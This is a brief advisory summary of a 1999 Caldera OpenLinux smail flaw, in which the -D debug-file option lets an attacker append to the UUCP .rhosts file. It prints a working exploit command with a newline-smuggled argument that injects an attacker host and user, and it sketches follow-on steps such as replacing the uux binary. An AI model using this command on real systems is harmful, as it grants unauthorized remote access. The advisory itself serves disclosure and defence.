Caldera OpenLinux 'smail -D' Command Vulnerability
According to the Caldera advisory (CSSA-1999:001.0), smail's -D option names the debug file to use. If an attacker submits a UUCP job containing the following rmail invocation:
rmail -N -D /usr/lib/uucp/.rhosts -oMs "joe\nhostname user\n" uucp
where '\n' is a newline, and 'hostname' and 'user' specify the attacking host and user, then 'smail' will happily append the following to the UUCP '.rhosts' file:
rmail: Debugging started: pid=25919
write_log:Received FROM:uucp HOST:joe
... some more lines ...
The attacker can then 'rsh' into the target host and try to exploit the UUCP account (e.g. by replacing the 'uux' binary).
Note that this hole is also exploitable locally; all you have to do is call 'uux rmail ....' to make it work.